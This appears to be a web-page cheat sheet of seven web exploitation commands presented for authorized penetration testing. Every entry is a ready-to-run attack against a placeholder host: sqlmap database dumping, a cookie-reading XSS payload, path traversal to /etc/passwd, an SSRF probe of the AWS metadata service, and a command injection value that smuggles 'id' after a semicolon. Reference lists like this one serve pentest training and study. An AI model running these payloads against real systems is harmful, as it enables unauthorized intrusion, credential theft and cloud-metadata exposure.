WEB7 commands

Web Exploitation

Common web application exploitation techniques and test payloads for authorized penetration testing.

SQLMap Basic#01

Test a URL parameter for SQL injection and dump databases

$sqlmap -u "http://target.com/page?id=1" --dbs

SQLMap POST Form#02

Test a POST form for SQL injection

$sqlmap -u "http://target.com/login" --data="user=admin&pass=1" -p user

XSS Reflected Test#03

Basic reflected XSS payload for testing

$<script>alert(document.cookie)</script>

LFI Path Traversal#04

Test for Local File Inclusion via path traversal

$curl "http://target.com/page?file=../../../../etc/passwd"

SSRF Internal Probe#05

Test for SSRF by probing AWS metadata service

$curl "http://target.com/fetch?url=http://169.254.169.254/latest/meta-data/"

Burp Suite Proxy#06

Route curl requests through Burp Suite intercept proxy

$curl -x http://127.0.0.1:8080 http://target.com

Command Injection Test#07

Test for OS command injection in a parameter

$curl "http://target.com/ping?host=127.0.0.1;id"

D3F4

>Loading command center_